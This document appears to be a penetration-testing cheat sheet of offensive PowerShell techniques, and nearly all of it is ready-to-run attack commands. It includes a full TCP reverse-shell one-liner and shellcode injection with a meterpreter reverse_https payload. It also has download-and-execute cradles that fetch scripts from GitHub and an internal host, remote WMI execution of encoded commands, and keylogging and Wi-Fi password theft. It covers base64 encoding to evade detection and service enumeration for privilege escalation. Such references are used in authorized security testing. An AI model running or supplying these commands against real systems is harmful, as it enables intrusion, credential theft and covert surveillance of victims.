Powershell

Table of Contents

Reverse Shell One liner

$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

PowerSploit

Invoke-Shellcode

You've got admin credential, and had shell on the target machine.

Invoke-Shellcode

Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden

$Proc = Get-Process notepad

Invoke-Shellcode -ProcessId $Proc.Id -Payload windows/meter-preter/reverse_https -Lhost <ip> -Lport 443 -Verbose

# Or, in memory

IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.10 -Lport 443 -Force

Invoke-WmiMethod

To remotely connect to another Windows systems and execute the encoded base64 string on a specific port.

Invoke-WmiMethod -Class Win32_Process -Name create -ArgumentList "powershell.exe -enc [Base64 encoded string]" -ComputerName [victim IP] -Credential [Username]

Get-Keystrokes

powershell.exe

IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')

Get-Keystrokes -LogPath C:\key.log -CollectionInterval 1

Exfiltration/Out-Minidump.ps1 (dump memory from a process)

Exfiltration/Get-TimedScreenshot.ps1 (take a screen shot of the victims computer)

Nishang

Get-Information.ps1

Pull information from the Power Shell environment, Putty information, recently used commands, shares, environment variables, SNMP info, installed applications, domain information, user information, system information, and wireless information.

powershell -ExecutionPolicy bypass -file Get-Information.ps1

Get-WLAN-Keys.ps1

Pull down all of the users' Wi-Fi information and the stored settings, which includes the SSID and password.

.\GetWLAN-Keys.ps1

StartListener.py

Use with powersploit reverse shells. It sets up a listener and can migrate to process when a target connects to it.

python ./StartListner.py [Host IP] 443

Ps_encoder.py

Use with power shell commands to encode them to base64 and avoid detection.

echo "IEX (New-Object Net.WebClient).DownloadString('https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); InvokeShellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.10 -Lport 443 -Force" > raw.txt

./ps_encoder.py -s raw.txt

Get System Release ID

(Get-Item "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion").GetValue('ReleaseID')

Executing Command as Another User

You have user credential, but cannot connect to the machine with that user. The only thing you have is a service shell.

$pass = ConvertTO-SecureString '<passwd>' -Asplain -Force
$cred = New-Object System.Management.Automation.PSCredential('.\hector', $pass)
invoke-command -Computer <computer-name> -Credential $cred -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.101.0.10/rs.ps1') }

Get User ACL

# user acl on registry
ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights | Foreach-Object {$_.DiscretionaryAcl}

Go into Registry Mode

cd HKLM:

cd SYSTEM\CurrentControlSet\Services

# dump all services
gci

# get all service properties
$services = Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\*

# get chile name and count, the objectname can print the service running context, if you can manipulate service, find those running as system
$services | select [PSChildName|ObjectName] | measure

$services | where { ($_.ObjectName -match 'LocalSystem') }

# and find those whose start is 0x03, which means manual
$services | where { ($_.ObjectName -match 'LocalSystem') -and $_.Start -match '3') }

# check the security of service in powershell
cmd \c sc sdshow wuauserv

# then
ConvertFrom-SddlString -Sddl "sddl from last command" | Foreach-Object {$_.DiscretionaryAcl}

# list all services with can be started
foreach ($service in $service-names) { $sddl = (cmd /c sc sdshow $service); if $sddl -match "RP[A-Z]*?;;;AU" { $service }}